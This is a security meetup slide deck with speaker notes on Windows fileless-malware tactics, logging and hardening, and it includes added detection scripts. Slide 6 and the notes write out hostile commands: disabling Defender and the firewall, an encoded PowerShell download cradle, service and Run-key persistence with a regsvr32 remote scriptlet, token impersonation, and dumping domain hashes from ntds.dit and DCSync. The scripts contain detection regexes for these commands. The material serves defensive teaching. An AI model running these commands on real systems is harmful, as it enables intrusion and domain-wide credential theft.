Jesse Moore presented this deck at the South Sound Hackers Meetup on September 23rd, 2018, to provide security awareness of adversary tactics, logging, and secure configurations for Windows environments.
https://www.meetup.com/SouthSound-hackers-Meetup/events/past/
2. WARNING… Disclaimer
> The following presentation contains my thoughts, ideas and opinions. They do not represent those of my current or past employers.
> Any events, characters and companies depicted in the course of this presentation are purely fictitious. Any similarity to actual events, characters and companies is merely coincidental.
> Do not use the tactics/techniques presented here for evil.
3. What will you walk away from here with?
– This slide deck!
– Security awareness of fileless malware adversary tactics/techniques and their detection.
– Motivation to look at OS configurations (registry/services) and logs, and to simulate adversaries to secure your part of the world.
Security depends on US! Together We Can Defend!
4. WHO Am I?
> Jesse Moore
– Threat Detection and Response Team @ UW Medicine.
– Too many certs to list (look me up on LinkedIn)
> GIAC Certified Forensic Analyst, GIAC Penetration Tester
https://www.linkedin.com/in/jessefmoore/
Jessefmoore+DFIR@gmail.com
Security enabler, just someone wanting to assist with security!
5. What is the Agenda?
> Security awareness of some fileless malware adversary tactics/techniques
– In-memory attacks
– Empire demo
– Phish with SET
– Abuse Windows features
– PTH (pass-the-hash) demo
– CIS-CAT (Configuration Assessment Tool) demo
> Awareness of defense approaches
– Logging
> PowerShell Script Block Logging
> Command-line auditing
> Sysmon v8 logging
> Registry monitoring
– Motivation to secure your part of the world
> CIS hardening URL
> US-CERT advisories
> Logging cheat sheets
> References to adversary tactics
…
6. What's that? ¯\_(ツ)_/¯
whoami
systeminfo
qwinsta
taskkill /f /im MsMpEng.exe
netsh advfirewall set currentprofile state off
netsh advfirewall set domainprofile state off
netsh advfirewall set allprofiles state off
powershell -nop -exec bypass -EncodedCommand "cABvAHcAZQByAHMAaABl"
sc.exe create "svvchost" binpath= "c:\temp\svvchost.exe"
sc.exe start svvchost
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "start" /d "regsvr32 /u /s /i:http://www.wingtiptoys.com/stext.sct scrobj.dll" /f
Reference: https://gallery.technet.microsoft.com/Azure-Security-Center-549aa7a4
7. Okay, let's talk stats
> What is the biggest risk to the org?
– Taken together, phishing and pretexting represent 93% of all social breaches in the study. Email was the most common attack vector (96%).
Verizon Data Breach Investigations Report (DBIR)
…
Phish creds -> OWA -> phish other users
Phish creds -> OWA -> find systems the account has access to
Phish creds -> VPN -> workstation
Phish creds -> system access -> Mimikatz
Phish creds -> system access -> Empire
Phish creds -> system access -> Meterpreter
Phish creds -> system access -> BloodHound
https://www.cobaltstrike.com/downloads/csmanual311.pdf
9. Being prepared… What can I do?
> Configuration best practices
Must be aware to be prepared.
Reference: https://learn.cisecurity.org/cis-cat-landing-page
10. CIS Controls: 9 Limitation and Control of Network Ports, Protocols, and Services
CIS_Microsoft_Windows_10_Enterprise_Release_1607_Benchmark_v1.2
11. Being aware something is bad
> Patch software
– US-CERT advisories: https://www.us-cert.gov/mailing-lists-and-feeds
Must be aware to be prepared.
29. Token stealing? Monitor who logs on where, and when.
Use BloodHound to visualize accounts that may lead to sensitive stuff leaving your organization at risk.
Reference: Derivative Local Admin http://www.sixdub.net/?p=591
31. What about Active Directory? Get the hashes
> Invoke-NinjaCopy.ps1
– Copy the ntds.dit database along with the SYSTEM hive (the boot key in SYSTEM is needed to decrypt the hashes)
– Detection: PowerShell v5 Script Block Logging
> DCSync (Empire)
– Detection: https://github.com/shellster/DCSYNCMonitor
> Compare Have I Been Pwned NTLM hashes with the ntds.dit NTLM hashes
– How-to: https://jacksonvd.com/pwned-passwords-and-ntlm-hashes/
32. Mimikatz detections
> Monitor the registry!
– Disable reversible encryption
– Disable LM and NTLMv1 (LmCompatibilityLevel = 5: send NTLMv2 only, refuse LM and NTLM)
– Disable credential caching (CachedLogonsCount)
– LSA protection against loading of third-party modules (RunAsPPL = 1)
– Disable WDigest (UseLogonCredential = 0, so cleartext passwords are no longer kept in LSASS)
– Prevent the use of saved passwords
– Credential Guard (Windows 10 Enterprise / Server 2016)
– Protected Users security group (Windows Server 2012 R2 and later)
– Prevent getting debug privileges
> Remove SeDebugPrivilege from Administrators. You can do it using GPO (local or domain): go to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment, define the "Debug programs" right and leave it empty. Caveat: code already running as SYSTEM does not need this privilege to open LSASS, so this only raises the bar for local admins.
…
33. Fileless malware detections
> Detect Cobalt Strike Beacon
– https://blog.jpcert.or.jp/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html
– SMB named pipes from workstation to workstation
> Detect Meterpreter
– rundll32.exe process, Poker ports, network analysis
– EDR query (Carbon Black Response syntax): childproc_name:"rundll32.exe" AND digsig_result:"Unsigned" AND path:c:\windows\*
– https://github.com/countercept/memory-carving-scripts
…
34. DEMO: Perform memory (Empire) attack & detection!
– Fileless malware demo:
> Detect Empire in memory with a PowerShell script (Get-InjectedThread)
https://screencast-o-matic.com/u/vqZ/Find_FilelessMal
35. DEMO: SET (phish) attack. Perform the phish attack!
– Phish attack (how bad can it be?)
> Kali SET phishing: https://screencast-o-matic.com/u/vqZ/Kali_SET_PhishingWebsite
36. What other attacks are there?
> Windows
– Abusing Windows
> https://screencastomatic.com/u/vqZ/MulitRelayResponderSetup
– https://www.youtube.com/watch?v=rjRDsXp_MNk (10:36 minutes)
– https://screencast-o-matic.com/u/vqZ/BuildMacroExploitEmpire
– https://screencast-o-matic.com/u/vqZ/CrackHashResponder
> https://screencast-o-matic.com/u/vqZ/PTH-Detection
Need to monitor systems to find evidence of activities…
37. DEMO: Perform OS configuration hardening! Windows config benchmarks for defense
– Automatically find secure configs
> CIS-CAT: Configuration Assessment Tool.
> https://screencast-o-matic.com/u/vqZ/CIS-CAT
Reference:
> https://learn.cisecurity.org/cis-cat-landing-page
40. Who can help in the community? Hunt scripts
Example of stuff in this GitHub repo:
https://github.com/johnfranolich/Hunting-Scripts
41. Look for behavior
> Time
> Baseline (what is normal?)
> Outliers (frequency analysis)
> Hunt behavior more than signatures
> Build out capabilities (identify/expose)
> Research… (understand attacks and build defenses)
…
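An added example of the baseline/outlier idea on this slide and of the "monitor who logs on where, and when" point on slide 29, written for this page rather than taken from the deck: stack-count (user, target host, logon type) triples and each user's usual logon hours from a known-good window of 4624 events, then flag today's events that are new, rare, out of hours, or workstation-to-workstation remote logons. The events are constructed, and the WS- naming convention used to recognise workstations is an assumption for the example.

```python
from collections import Counter

# Constructed Security 4624 (successful logon) records; not real telemetry.
# user = account, src = workstation the logon came from, dst = host that logged the
# event, type = logon type (2 interactive, 3 network, 10 RDP), hour = local hour.
def _repeat(n, user, src, dst, ltype, hours=range(8, 18)):
    hours = list(hours)
    return [{"user": user, "src": src, "dst": dst, "type": ltype, "hour": hours[i % len(hours)]}
            for i in range(n)]

BASELINE_EVENTS = (
    _repeat(10, "alice", "WS-ALICE", "WS-ALICE", 2)
    + _repeat(10, "alice", "WS-ALICE", "FS01", 3)
    + _repeat(10, "bob", "WS-BOB", "WS-BOB", 2)
    + _repeat(10, "bob", "WS-BOB", "FS01", 3)
    + _repeat(10, "svc_backup", "BKP01", "FS01", 3, hours=[1, 2])   # nightly backup job
    + _repeat(2, "admin_it", "WS-IT", "DC01", 10)                   # rare but legitimate RDP
)

TODAY_EVENTS = [
    {"user": "alice", "src": "WS-ALICE", "dst": "WS-ALICE", "type": 2, "hour": 9},   # normal
    {"user": "bob", "src": "WS-BOB", "dst": "FS01", "type": 3, "hour": 11},          # normal
    {"user": "alice", "src": "WS-ALICE", "dst": "WS-BOB", "type": 3, "hour": 2},     # new, out of hours, ws-to-ws
    {"user": "admin_it", "src": "WS-IT", "dst": "DC01", "type": 10, "hour": 9},      # rare
    {"user": "alice", "src": "WS-ALICE", "dst": "DC01", "type": 3, "hour": 14},      # never seen
]


def is_workstation(host):
    # Assumption for the example: workstations carry a WS- prefix. In production derive
    # this from the computer object's OU or operating system, not from the name.
    return host.upper().startswith("WS-")


def build_baseline(events):
    """Stack-count (user, dst, type) triples and collect each user's usual logon hours."""
    counts = Counter((e["user"], e["dst"], e["type"]) for e in events)
    hours = {}
    for e in events:
        hours.setdefault(e["user"], set()).add(e["hour"])
    return counts, hours


def find_outliers(counts, hours, events, min_seen=3):
    """Return [(event, [reasons])] for events that deviate from the baseline."""
    out = []
    for e in events:
        reasons = []
        seen = counts[(e["user"], e["dst"], e["type"])]
        if seen == 0:
            reasons.append("never seen in baseline")
        elif seen < min_seen:
            reasons.append(f"rare: seen {seen} times in baseline")
        if e["hour"] not in hours.get(e["user"], set()):
            reasons.append(f"outside user's baseline hours ({e['hour']:02d}:00)")
        if (e["type"] in (3, 10) and e["src"] != e["dst"]
                and is_workstation(e["src"]) and is_workstation(e["dst"])):
            reasons.append("workstation-to-workstation remote logon (lateral movement pattern)")
        if reasons:
            out.append((e, reasons))
    return out


if __name__ == "__main__":
    counts, hours = build_baseline(BASELINE_EVENTS)
    for e, reasons in find_outliers(counts, hours, TODAY_EVENTS):
        print(f"{e['user']:>10} {e['src']:>8} -> {e['dst']:<8} type {e['type']:<2} "
              f"{e['hour']:02d}:00 | " + "; ".join(reasons))
```

The workstation-to-workstation rule fires on exactly the SMB/RDP hop that Empire, Cobalt Strike and pass-the-hash rely on; a normal user's workstation has no reason to open a network logon on a peer workstation, so that pattern is worth hunting even when the account and hour look ordinary.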
44. Monitor your logs, have secure configurations, patch (or place in a secure enclave) & simulate adversary tactics to obtain detection mechanisms (behaviors)…
– Best practices
> Center for Internet Security https://www.cisecurity.org/cybersecurity-best-practices/ (disable services/ports not needed, e.g. LLMNR)
> Check what logs you need on the system https://www.imfsecurity.com/compare/
> Enable PowerShell Script Block Logging (find evil): https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
> Monitor your registry, WMI, command lines, API calls and executables
> Hunt more behavior and some signatures
– Know thy enemy
> MITRE ATT&CK https://attack.mitre.org/wiki/ATT%26CK_Matrix
> Check defenses with the Atomic Red Team repo https://redcanary.com/atomic-red-team/
> Cobalt Strike manual for TTPs: https://www.cobaltstrike.com/downloads/csmanual311.pdf
The End… until next time.
Thank you for attending!
We will provide this slide deck, so we may concentrate on this being more of a conversation among friends and peers. Kind of like a MeetUp
Hope this arms everyone with resources to detect, and secure UW devices.
https://www.cisecurity.org/
https://www.microsoft.com/en-us/msrc/technical-security-notifications
https://www.us-cert.gov/mailing-lists-and-feeds
https://www.malwarearchaeology.com/cheat-sheets
Free tools to review/monitor/log: Sysmon, audit logs (command-line auditing), PowerShell
https://ics-cert.us-cert.gov/sites/default/files/recommended_practices/RP_Patch_Management_S508C.pdf
In-memory – Empire, Cobalt Strike, Meterpreter
Registry-resident – malicious scripts stored in the registry, e.g. under autorun keys
Script-based – VBS, PowerShell, Python, etc.
Living off the land – abusing Windows features such as LLMNR, CertUtil, PsExec, WMI, PowerShell, WMIC and the .NET API
¯\_(ツ)_/¯
The steps that follow assume the attacker has already compromised the machine… Now the attacker is moving to the installation and exploitation phase.
powershell -nop -exec bypass -Enc <base64>: the encoded command is powershell -command "& { iwr https://download.sysinternals.com/files/Sysmon.zip -OutFile c:\temp\svchost.exe }" (a benign download standing in for a payload, written under a name that masquerades as svchost).
sc: now the attacker tries to establish persistence by creating a service based on the file that was downloaded (beacon / reverse shell).
REG ADD: the intent is to simulate a download. To continue establishing persistence, the attacker can also add a registry entry that downloads a malicious program once the computer starts (beacon again?).
"Fileless" actually refers to the techniques attackers use to avoid dropping malicious executable files on disk, to evade detection.
Reference: https://www.barkly.com/what-are-fileless-attack-techniques
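As an added example that is not part of the original deck, here is a small Python triage script for the command-line telemetry the slides recommend collecting (Security 4688 with command-line auditing, or Sysmon Event ID 1). It runs over a constructed set of command lines that mirror the chain on slide 6 and in the notes above, decodes the -EncodedCommand blob (base64 of UTF-16LE) so the download cradle inside it can be inspected, and flags each step by behaviour. The sample command lines, the finding names, and the choice of c:\temp, Users and ProgramData as "user-writable" paths are assumptions made for the example; port the regexes to your SIEM's query language.

```python
import base64
import re

# Constructed sample: process command lines as they would appear in Sysmon Event ID 1
# or Security 4688 (with command-line auditing on). They mirror the chain on slide 6
# and are not real telemetry; the encoded blob is built from DOWNLOAD_CRADLE below.
DOWNLOAD_CRADLE = (
    'powershell -command "& { iwr https://download.sysinternals.com/files/Sysmon.zip '
    '-OutFile c:\\temp\\svchost.exe }"'
)
ENCODED = base64.b64encode(DOWNLOAD_CRADLE.encode("utf-16le")).decode("ascii")

SAMPLE_CMDLINES = [
    "whoami",
    "taskkill /f /im MsMpEng.exe",
    "netsh advfirewall set allprofiles state off",
    "powershell -nop -exec bypass -EncodedCommand " + ENCODED,
    'sc.exe create "svvchost" binpath= "c:\\temp\\svvchost.exe"',
    'reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run /v "start" '
    '/d "regsvr32 /u /s /i:http://www.wingtiptoys.com/stext.sct scrobj.dll" /f',
    "notepad.exe C:\\Users\\jdoe\\notes.txt",   # benign noise
]

# (finding, pattern): match the behaviour rather than an exact string, so every
# netsh profile variant, sc/sc.exe, and any Run-key hive spelling is caught.
RULES = [
    ("Defender engine killed (impair defenses)",
     re.compile(r"taskkill\b.*\bMsMpEng\.exe", re.I)),
    ("host firewall disabled (impair defenses)",
     re.compile(r"netsh\s+advfirewall\s+set\s+\w+profiles?\s+state\s+off", re.I)),
    ("PowerShell policy bypass or encoded command",
     re.compile(r"powershell.*?(?:-exec(?:utionpolicy)?\s+bypass|"
                r"-e(?:ncodedcommand|nc|c)?\s+[A-Za-z0-9+/=]{8,})", re.I)),
    ("service created from user-writable path (persistence)",
     re.compile(r"\bsc(?:\.exe)?\s+create\b.*binpath=\s*\"?[a-z]:\\(?:temp|users|programdata)\\", re.I)),
    ("Run key pointing regsvr32 at a remote scriptlet (persistence, Squiblydoo)",
     re.compile(r"reg\s+add\s+hk\w+\\software\\microsoft\\windows\\currentversion\\run\b"
                r".*regsvr32.*(?:/i:http|scrobj\.dll)", re.I)),
]

# Applied to the decoded PowerShell payload, which is where the real intent hides.
DECODED_RULES = [
    ("download cradle inside encoded command",
     re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|downloadfile|net\.webclient|start-bitstransfer)\b", re.I)),
]

ENC_RE = re.compile(r"-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{8,})", re.I)


def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand / -enc / -e, or None if absent."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    blob = m.group(1)
    blob += "=" * (-len(blob) % 4)            # tolerate stripped base64 padding
    try:
        return base64.b64decode(blob).decode("utf-16le", errors="ignore")
    except ValueError:                        # binascii.Error is a ValueError
        return None


def inspect(cmdline):
    """Return the findings for one command line (empty list = nothing suspicious)."""
    hits = [name for name, rx in RULES if rx.search(cmdline)]
    decoded = decode_encoded_command(cmdline)
    if decoded:
        hits += [name for name, rx in DECODED_RULES if rx.search(decoded)]
    return hits


def triage(cmdlines):
    """Map each suspicious command line to its findings; clean lines are dropped."""
    flagged = {}
    for cmd in cmdlines:
        hits = inspect(cmd)
        if hits:
            flagged[cmd] = hits
    return flagged


if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_CMDLINES).items():
        print(f"{cmd[:70]:<70} -> {'; '.join(hits)}")
```

With PowerShell Script Block Logging enabled, event 4104 already carries the decoded script text, so DECODED_RULES can be run on those events directly; the decode step here is for hosts where only process creation (4688/Sysmon 1) is available.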
Phish creds -> system access -> BloodHound to map the attack path
https://www.cobaltstrike.com/downloads/csmanual311.pdf page 10 for the image.
Cobalt Strike has a GUI that conveys the credential snowball attack.
What is CS?
CS is adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors.
https://www.cobaltstrike.com/downloads/csmanual311.pdf page 6
If you learn nothing else from me other than to check the manual and the blog posts by Raphael, my time here is worth it.
https://www.cobaltstrike.com/aggressor-script/index.html
Aggressor Script is a scripting language for red team operations and adversary simulations inspired by scriptable IRC clients and bots.
https://github.com/bluscreenofjeff/AggressorScripts
CIS-CAT installation: https://screencast-o-matic.com/watch/cFj6F7qjgf
Logging:
Sysmon, audit logging, registry monitoring, PowerShell Script Block Logging, command-line auditing (LOG-MD and CIS have lists of what to enable)
The OWASP Top 10 2017 now has a logging requirement (A10: Insufficient Logging & Monitoring).
Going a step further: act like the adversary and create detections for network attacks and host attacks.
Living off the land: DCOM, WMI, API, EXE attacks, website attacks, AD attacks
CIS benchmark item for LLMNR (the policy set to Enabled writes EnableMulticast = 0):
Audit: Navigate to the UI path articulated in the Remediation section and confirm it is set as prescribed. This group policy setting is backed by the following registry location: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient:EnableMulticast
Remediation: To establish the recommended configuration via GP, set the following UI path to Enabled: Computer Configuration\Policies\Administrative Templates\Network\DNS Client\Turn off multicast name resolution
Impact: In the event DNS is unavailable a system will be unable to request it from other systems on the same subnet.
https://screencastomatic.com/u/vqZ/MulitRelayResponderSetup
https://screencast-o-matic.com/u/vqZ/CrackHashResponder
Patch software (WSUS, SCCM, PowerShell, etc.):
https://ics-cert.us-cert.gov/advisories-by-vendor
Not vulnerability or risk management: https://www.us-cert.gov/sites/default/files/resources/ncats/RVA-Sample-Report.pdf
Even Twitter works for the latest and greatest tactics… SubTee and the whole SpecterOps crew.
ATT&CK is useful for understanding security risk against known adversary behavior, for planning security improvements, and for verifying that defenses work as expected.
Who has played in, or is going next year to, any CCDC competitions? On the blue team?
The mission of the Collegiate Cyber Defense Competition (CCDC) system is to provide institutions with an information assurance or computer security curriculum a controlled, competitive environment to assess their students' depth of understanding and operational competency in managing the challenges inherent in protecting a corporate network infrastructure and business information systems.
CCDC Events are designed to:
Build a meaningful mechanism by which institutions of higher education may evaluate their programs
Provide an educational venue in which students are able to apply the theory and practical skills they have learned in their course work
Foster a spirit of teamwork, ethical behavior, and effective communication both within and across teams
Create interest and awareness among participating institutions and students
Need to monitor Registry and Installed Patches because adversaries are looking and leaving signs of activities.
Check autoruns for startup programs.
Check the hashes of known files that might have been backdoored with an extra malicious program. Think BackdoorFactory!
These reg keys basically spawn your programs; as you can see this is very dangerous, because these keys are commonly abused by viruses and Trojans.
[HKEY_CLASSES_ROOT\exefile\shell\open\command] @="\"%1\" %*"
[HKEY_CLASSES_ROOT\comfile\shell\open\command] @="\"%1\" %*"
[HKEY_CLASSES_ROOT\batfile\shell\open\command] @="\"%1\" %*"
[HKEY_CLASSES_ROOT\htafile\Shell\Open\Command] @="\"%1\" %*"
[HKEY_CLASSES_ROOT\piffile\shell\open\command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command] @="\"%1\" %*"
[HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command] @="\"%1\" %*"
Each key should have a default value of "%1" %*. If this is changed to "server.exe %1 %*", then server.exe will be executed EVERY TIME an exe/pif/com/bat/hta is executed.
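As an added example (not from the talk), a PowerShell audit of the shell\open\command keys listed above: it reports every key whose default value differs from the baseline the slide gives, so a swapped-in handler stands out for review. Run it from a normal PowerShell prompt on the host being checked.

```powershell
# Added example, not from the slides: audit the shell\open\command keys above.
# Reports every key whose default value differs from the baseline the slide gives,
# so a tampered handler (the "server.exe %1 %*" case) stands out for review.
# Caveat: htafile legitimately points at mshta.exe, so expect it to be flagged;
# treat the output as review items against a known-good baseline, not as verdicts.
function Test-ShellOpenCommand {
    param([string]$Expected = '"%1" %*')

    $keys = @(
        'Registry::HKEY_CLASSES_ROOT\exefile\shell\open\command',
        'Registry::HKEY_CLASSES_ROOT\comfile\shell\open\command',
        'Registry::HKEY_CLASSES_ROOT\batfile\shell\open\command',
        'Registry::HKEY_CLASSES_ROOT\htafile\Shell\Open\Command',
        'Registry::HKEY_CLASSES_ROOT\piffile\shell\open\command',
        'Registry::HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\open\command',
        'Registry::HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\open\command',
        'Registry::HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open\command',
        'Registry::HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\Open\Command',
        'Registry::HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\open\command'
    )

    foreach ($key in $keys) {
        if (-not (Test-Path -LiteralPath $key)) {
            [pscustomobject]@{ Key = $key; Status = 'MISSING'; Value = $null }
            continue
        }
        # The key's unnamed default value is exposed as the '(default)' property.
        $value  = (Get-ItemProperty -LiteralPath $key).'(default)'
        $status = if ($value -eq $Expected) { 'OK' } else { 'CHANGED' }
        [pscustomobject]@{ Key = $key; Status = $status; Value = $value }
    }
}

# Show only what needs a human look; pipe to Export-Csv to keep a per-host baseline.
Test-ShellOpenCommand | Where-Object Status -ne 'OK' | Format-Table -AutoSize
```

Compare the CHANGED rows against a snapshot taken from a clean build of the same image; a handler that now names an unexpected executable is the sign the slide describes.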
https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6
https://gist.github.com/bohops/f722f1a54d9ac1070350bdcaf2da618b
Via Windows 7: https://www.youtube.com/watch?v=VytjV2kPwSg
Via Task manager: https://www.youtube.com/watch?v=oPk5off3yUg
Via Windows Server 2012 R2 https://www.youtube.com/watch?v=OgsoIoWmhWw
This technique is in memory
https://live.sysinternals.com/ logonsessions.exe
OK enough CCDC stuff back to “What even looks bad? (Adversary Tactics)”
Attackers who have successfully installed such malware in a network will attempt to take control of systems within the network in the following sequence, in order to collect confidential information, etc.
1. Initial investigation: Collect information of the infected machine
2. Reconnaissance: Look for information saved in the machine and remote machines within the network
3. Spread of infection: Infect the machine with other malware or try to access other machines
Yes even if you don’t have central logging…
What can you do?
Enable logging (even if you don’t have central logging).
Windows PowerShell cheat sheet
https://www.malwarearchaeology.com/cheat-sheets
You really need to log to find Bad! How do you find them?? A more advanced solution is Sysmon.
Download and execute code: Powershell, Wscript, mshta, rundll32, Wmic, regsvr32, MSBuild, etc.
Client-side attacks are a very common way to gain a foothold in a network.
https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1193/T1193.md#atomic-test-1---download-spearphishing-attachment
https://github.com/redcanaryco/atomic-red-team
https://github.com/redcanaryco/atomic-red-team/tree/master/atomics
Detect .NET with Event Tracing for Windows (ETW) providers
https://countercept.com/blog/detecting-malicious-use-of-net-part-2/
This could be used as a mechanism to discover suspicious assembly loading on a system, either in the form of legitimate assemblies being used maliciously, or potentially custom assemblies being loaded purely in memory.
GhostPack Review https://youtu.be/eoh_yqLOenI
https://posts.specterops.io/ghostpack-d835018c5fc4
https://github.com/GhostPack
SharpUp is a C# port of various PowerUp functionality
SharpDump is a C# port of PowerSploit's Out-Minidump.ps1
SharpRoast is a C# port of various PowerView's Kerberoasting functionality
SafetyKatz is a combination of a slightly modified version of @gentilkiwi's Mimikatz project and @subTee's .NET PE Loader
https://astr0baby.wordpress.com/2018/07/25/ghostpack-quick-review/
Now for more Defender resources such as SANS Forensics!
https://www.sans.org/security-resources/posters/
Until October something… I think 8th??? Not sure!
Remote Access: RDP Map Network Shares with net use
Remote Execution: PSEXEC, Schedule Tasks, Services, WMI/WMIC, PowerShell Remoting
https://raw.githubusercontent.com/olafhartong/sysmon-modular/master/attack_matrix/demo.gif
https://github.com/olafhartong/sysmon-modular/tree/master/attack_matrix
https://www.malwarearchaeology.com/cheat-sheets
See it LIVE:
https://mitre.github.io/attack-navigator/enterprise/#layerURL=https%3A%2F%2Fraw.githubusercontent.com%2Folafhartong%2Fsysmon-modular%2Fmaster%2Fattack_matrix%2FSysmon-modular.json&scoring=false&clear_annotations=false
T1204 ATT&CK –Monitor the execution of and command-line arguments
What about no logs things like stealing tokens?
meterpreter > use incognito
meterpreter > impersonate_token CAMPUS\\Administrator
Then add more accounts.
Mount file share: C:\Windows\system32>net use Z: \\192.168.140.137\C
Then copy file: copy "y:\Software\MALSoftware\MALClient\Installers\windows\installer\setup.exe" z:\Windows\system32\
Then run process: shell wmic /node:host process call create "c:\windows\temp\malware.exe"
Derivative Local Admin http://www.sixdub.net/?p=591
Abusing GPO Control
https://wald0.com/?p=179
https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
Policy Location: Computer Configuration\Preferences\Control Panel Settings\Local Users and Groups
Abuse: Add new local admin account.
Policy Location: Computer Configuration\Preferences\Control Panel Settings\Scheduled Tasks
Abuse: Deploy a new evil scheduled task (ie: PowerShell download cradle).
Policy Location: Computer Configuration\Preferences\Control Panel Settings\Services
Abuse: Create and configure new evil services.
Policy Location: Computer Configuration\Preferences\Windows Settings\Registry
Abuse: Update specific registry keys. Very useful for disabling security mechanisms, or triggering code execution in any number of ways.
Policy Location: Computer Configuration\Policies\Windows Settings\Scripts (startup/shutdown)
Abuse: Configure and deploy evil startup scripts. Can run scripts out of the GPO directory; can also run PowerShell commands with arguments.
Here you can see how an account can be a member of a group that has access to a computer on which another account has a session; from there the token could be stolen and used to get to other computers.
User sessions (where people are logged on), so we can steal passwords or impersonate: Andy Robbins on how BloodHound session collection works: https://www.youtube.com/watch?v=q86VgM2Tafc
Need to copy the ntds.dit file using vssadmin c:\windows\ntds.dit
OR just use Invoke-NinjaCopy
.\Invoke-NinjaCopy.ps1 -path c:\windows\system32\config\system -localdestination c:\test\system -verbose -computername workstationvm
https://clymb3r.wordpress.com/2013/06/13/using-powershell-to-copy-ntds-dit-registry-hives-bypass-sacls-dacls-file-locks/
https://jacksonvd.com/pwned-passwords-and-ntlm-hashes/
Then, you need the SYSTEM registry hive. Luckily, this can be directly saved, by running –
reg save HKLM\SYSTEM <YOUR OUTPUT PATH HERE>
Now that we’ve got both of those files, we can start extracting hashes!
With the system extract and ntds.dit copy in hand, fire up PowerShell, it’s time for DSInternals!
Running the following will extract the hashes in Hashcat format (necessary for the next step) –
$key = Get-BootKey -SystemHivePath '<PATH TO SYSTEM HIVE HERE>'
Get-ADDBAccount -All -DBPath '<PATH TO NTDS.DIT HERE>' -BootKey $key | Format-Custom -View HashcatNT | Out-File <OUTPUT PATH HERE> -Encoding ASCII
Now that we have a neat little hash extraction, we can get to comparing our users’ passwords against the Pwned Passwords dataset.
https://www.troyhunt.com/pwned-passwords-now-as-ntlm-hashes/
https://github.com/thegeekkid/CompromiseCheck
Because NTLM hashes aren't salted (do read the two answers there if you're wondering why), providing them in downloadable form means they can easily be used to compare to hashes within an AD environment just as they are.
Script to compare:
Builds a hashmap of AD NTLM hashes/usernames and iterates through a second list of hashes, checking for the existence of each entry in the AD NTLM hashmap.
https://github.com/DGG-IT/Match-ADHashes/
The DSInternals PowerShell module can retrieve reversibly encrypted plaintext passwords, password hashes and Kerberos keys of all user accounts from remote domain controllers.
Dump all accounts at once, but this can cause heavy (= suspicious) replication traffic:
Get-ADReplAccount -All -NamingContext 'DC=Adatum,DC=com' -Server LON-DC1
https://www.dsinternals.com/en/retrieving-active-directory-passwords-remotely/
DCSync:
https://adsecurity.org/?p=1729
http://www.harmj0y.net/blog/redteaming/mimikatz-and-dcsync-and-extrasids-oh-my/
http://woshub.com/defending-windows-domain-against-mimikatz-attacks/
Credential Guard has appeared, which isolates and protects LSASS from unauthorized access.
OK, let’s move on to file-less malware detection and then the demo.
OK, let’s look at Empire.
(New-object System.net.Webclient).DownloadString()
DownloadString() does not download any file to the disk but it copies the content of the remote file directly to the memory of the victim machine.
Agent and how Get-InjectThread finds it video
This video will show Inveigh Responder and then Get-InjectedThread to detect Empire in memory that had an injected process.
Defenders can use PowerShell to detect obfuscation and injected processes that Empire uses.
PowerShell Empire uses a default agent string that is detectable via network monitoring.
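The DownloadString cradle above and the claim that defenders can use PowerShell to spot obfuscation, as an added example that is not part of the talk or of Empire: a small detector run over PowerShell script block logging (event 4104, which requires Script Block Logging to be enabled). The regex patterns and the example.test URL are my own constructions.

```powershell
# Added example, not from the slides: flag script blocks that look like in-memory
# download cradles or obfuscation, then run it over script block logging events
# (event 4104 in Microsoft-Windows-PowerShell/Operational). The patterns are
# this example's own choices, not a vendor or project list.
function Test-SuspiciousScriptBlock {
    param([Parameter(Mandatory)][string]$Text)

    $indicators = [ordered]@{
        # The cradle from the slide: download straight into memory, then execute.
        DownloadCradle = 'Net\.WebClient|DownloadString|DownloadData|Invoke-WebRequest'
        InMemoryExec   = 'Invoke-Expression|\bIEX\b'
        EncodedCommand = '-(e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}'
        # Common obfuscation tells: backtick-broken tokens, char-code assembly,
        # tiny concatenated string pieces, and XOR decoding loops.
        Obfuscation    = '`\w|\[char\]\s*\d+|\(\s*''[^'']{1,3}''\s*\+\s*''|\bbxor\b'
    }

    $hits = foreach ($name in $indicators.Keys) {
        if ($Text -match $indicators[$name]) { $name }   # -match is case-insensitive
    }
    [pscustomobject]@{ Suspicious = ($hits.Count -gt 0); Indicators = @($hits) }
}

# Constructed sample echoing the slide's cradle; not captured from a real host.
$sample = '(New-Object System.Net.WebClient).DownloadString("http://example.test/a") | IEX'
Test-SuspiciousScriptBlock -Text $sample   # Suspicious = True; DownloadCradle, InMemoryExec

# Live use: review recent 4104 events. ScriptBlockText is the third event property.
$filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
Get-WinEvent -FilterHashtable $filter -MaxEvents 2000 -ErrorAction SilentlyContinue |
    ForEach-Object {
        $block  = [string]$_.Properties[2].Value
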